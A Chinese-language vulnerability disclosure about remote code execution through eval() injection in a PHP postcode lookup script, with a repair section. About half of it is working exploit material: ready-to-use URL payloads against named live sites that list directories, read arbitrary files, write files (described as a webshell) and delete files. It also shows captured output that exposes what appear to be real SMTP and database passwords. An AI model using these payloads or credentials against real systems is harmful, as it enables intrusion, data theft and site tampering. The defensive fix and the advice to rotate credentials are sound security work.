站长工具之“邮编区号查询”高危安全漏洞（eval 代码注入，可远程执行任意 PHP 代码）

方法1、服务器端代码检查方法: 在服务器上找到并打开“邮编区号查询”的相关 php 文件(常用文件名为 yb.php)，如果存在如下代码: [php] switch ($_GET['w']){ case "sheng": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");break; case "diqu": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");break; case "shi": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");break; case "cun": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");break; case "youbian": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");break; case "quhao": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");break; default: @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");break; }[/php] 则该站点存在漏洞。成因: eval() 执行的是一个用双引号拼出来的 PHP 源码字符串，来自 GET 参数 q 的关键字 $keyword[$ai] 未经任何过滤就被直接拼进了这段源码；eval 在执行这段代码时会按双引号字符串的规则解析其中的 `${...}` 复杂表达式并求值，因此提交形如 q=${@exit(...)} 的关键字，括号里的任意 PHP 表达式都会以 Web 服务进程的权限被执行（远程代码执行）。@ 只是压制了报错，并不能阻止执行。以下为验证步骤（payload 中的 @exit 用于在输出结果后立即终止脚本，便于直接读取回显）: #1 打印目录及文件，修改参数 d 的值即可遍历整站 http://tool.51cto.com/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../../ [php] Array ( [0] => . [1] => .. [2] => .bash_history [3] => .bash_logout [4] => .bash_profile [5] => .bashrc [6] => .gnome2 [7] => .mozilla [8] => .subversion [9] => .viminfo [10] => ECL [11] => admin.0day5.com [12] => admin.0day5.com.tar [13] => backup [14] => biaozhun [15] => bk [16] => 0day5.com [17] => count.0day5.com [18] => ipatent360 [19] => ipatent360.tar [20] => keji [21] => phpmyadmin [22] => wenshuwenan [23] => zixunbaogao )[/php] （从回显里的 .bash_history、.bashrc、.subversion 等条目看，../../../ 已经到达了运行 Web 服务的那个用户的家目录，多个站点的源码和备份包都在其中。） #2 读取文件，修改参数 d 的值即可读取整站任意文件 http://tool.0day5.com/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../../admin.0day5.com/tool/config.php [php] [123] => if( ! defined( 'SMTP_EMAIL_ACTIVE_PASSWORD' ) ) { [124] => define( 'SMTP_EMAIL_ACTIVE_PASSWORD', 'ecl123456' ); [125] => } [126] => if( ! 
defined( 'PAGE_CHARSET' ) ) { [127] => define( 'PAGE_CHARSET', 'utf-8' ); [128] => } [129] => /** [130] => * 统计数据库,连接配置 [131] => * @var [132] => */ [133] => $GLB_DB_MEMBER_CONFIG = array( [134] => 'host' => 'localhost', [135] => 'username' => 'admin', [136] => 'password' => 'egreen888888', [137] => 'database' => 'caogenbanquan', [138] => 'charset' => 'utf8' [139] => ); [140] => ?> )[/php] （这一步已经把 SMTP 口令和数据库账号口令完整读了出来，修复代码后这些凭据必须全部更换。） #3 写入任意文件（即所谓的 webshell），参数 d 为文件内容，n 为文件名。利用: http://tool.0day5.com/yb/yb.php?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=by:0day5.com&n=./../1.txt 对应文件地址: http://tool.0day5.com/1.txt （演示写的是 .txt，换成 .php 文件名就是可直接访问的 webshell。） #4 删除文件，参数 n 为文件名 http://tool.0day5.com//yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../1.txt 修补方法: 去掉 eval，直接调用匹配函数，不再把用户输入拼进代码字符串，七个分支（含 default）都要改: [php] switch ($_GET['w']){ case "sheng": $found = eregi($keyword[$ai],$detail[0]);break; case "diqu": $found = eregi($keyword[$ai],$detail[1]);break; case "shi": $found = eregi($keyword[$ai],$detail[2]);break; case "cun": $found = eregi($keyword[$ai],$detail[3]);break; case "youbian": $found = eregi($keyword[$ai],$detail[4]);break; case "quhao": $found = eregi($keyword[$ai],$detail[5]);break; default: $found = eregi($keyword[$ai],$dreamdb[$i]);break; }[/php] 补充说明: 上面的写法消除了代码执行，但 eregi 的第一个参数是正则表达式，用户输入仍被当作 pattern 使用，精心构造的表达式可能造成回溯耗尽（ReDoS）或匹配报错；而且 eregi 自 PHP 5.3 起已废弃、PHP 7.0 起已移除。建议改为按字面字符串做不区分大小写的查找，例如 sheng 分支写成: [php] $found = (stripos($detail[0], $keyword[$ai]) !== false); [/php] 如确实需要正则，则先转义再用 preg_match: [php] $found = (preg_match('/' . preg_quote($keyword[$ai], '/') . '/i', $detail[0]) === 1); [/php] 其余分支同理替换对应的 $detail[n] / $dreamdb[$i]。另外不要再用 @ 压制错误，并在整个文件里搜索是否还有其他 eval( 调用。修复后还应检查服务器上是否已被写入 webshell（本文 #3 即演示了写文件，攻击者可能早已利用），并更换 #2 中泄露的 SMTP 和数据库口令。
